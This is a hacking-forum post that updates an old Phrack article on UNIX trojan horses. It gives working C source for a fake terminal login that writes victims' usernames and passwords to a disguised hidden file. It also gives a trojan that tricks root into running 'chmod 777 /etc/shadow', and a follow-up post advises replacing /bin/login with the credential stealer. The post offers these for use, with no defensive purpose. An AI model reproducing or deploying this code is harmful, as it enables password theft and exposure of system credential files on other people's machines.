iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Gaining passwords
  • chroniccommand
    Posts: 1,389
    Last night I was browsing through some old phrack philes. I stumbled upon a pretty good guide by Shooting Shark titled UNIX Trojan Horses
    I read through it and thought to myself, this is a pretty good paper. Only thing is, it's pretty outdated :/ So I decided to update it a little. NOTE: Please read the original phrack issues(Link above) before reading through this.

    Phishing passwords:
    I thought this method was pretty cool. The idea was to recreate a login system that users think is real. I tested it on myself but the C code was outdated and didn't work :/ What a shame. Well I fixed it up a bit. Take a look at it:

    //Horse.c - Updated version of Shooting Sharks phisher
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    #define WAIT 3 //This will sleep for 3 seconds, emulating how long it takes after I log on
    #define INCORRECT \"Login incorrect\n\"
    #define FILENAME \".xintrc\" //Hidden file that looks like the xinitrc ;)

    void stop(void);

    int main(void)
    {
    char name[10], password[10];
    FILE *fp;
    system(\"clear\");
    printf(\"Arch Linux 2.6.36-ARCH (vandal) (tty1)\n\n\");
    printf(\"vandal login: \");
    fgets(name, sizeof(name), stdin);
    name[strcspn(name,\"\n\")] = '\0';
    printf(\"Password: \");
    fgets(password, sizeof(password), stdin);
    password[strcspn(password,\"\n\")] = '\0';
    sleep(WAIT);

    if((fp = fopen(FILENAME, \"a\")) != NULL)
    {
        fprintf(fp, \"User:   %s   Password:   %s\n\", name, password);
        fclose(fp);
        stop();
    }

    printf(INCORRECT);
    return 0;
    }

    void stop(void)
    {
    _Exit(0);
    }

    So at first it spits out what my system looks like. It says Arch Linux 2.6.36-ARCH (vandal) (tty1) Thats my machine name and current tty. Then I set the wait to 3 seconds to emulate how long it usually takes after logging in to a terminal on my system. It logs users and passwords to a file named .xintrc
    Here is a sample of the .xintrc file:

    User:   chronic   Password:   urmom
    User:   lol   Password:   lol
    User:   mary   Password:   jane

    As you can see we get a nicely formatted password file :)

    Reading anybodies files:
    Of course this part was also out of date. After all, it's from 86. Anyway, if we look through we can see Shooting Shark has included the source of a program that chmod's a file to be rwxrwxrwx. Chmodded to 777. Of course this code is out of date, and it could be much simpler.

    int main()
    {
    system(\"chmod 777 lol\");
    return 0;
    }

    This chmod's the file lol to 777, meaning anybody can read/write/execute it. Easy. Now you just need to get the root user(or any other user) to open it and have it chmod the file you want. For example if we want the root user to chmod the file /etc/shadow you just change the source to this:

    int main()
    {
    system(\"chmod 777 /etc/shadow\");
    return 0;
    }

    Bam, if the super user runs it, the /etc/shadow file is open to everybody. Of course you can add more system() lines to the source to have it preform more commands.

    Anyway, that's all. Figured I'd do a little update of that paper :)

    --chroniccommand
  • chroniccommand
    Posts: 1,389
    Oh and by the way, you can change /bin/login to the phisher and it should still log passwords and it will become the default login manager. Tried it on myself and it worked. Just make sure you make a backup of /bin/login first.
Add a Comment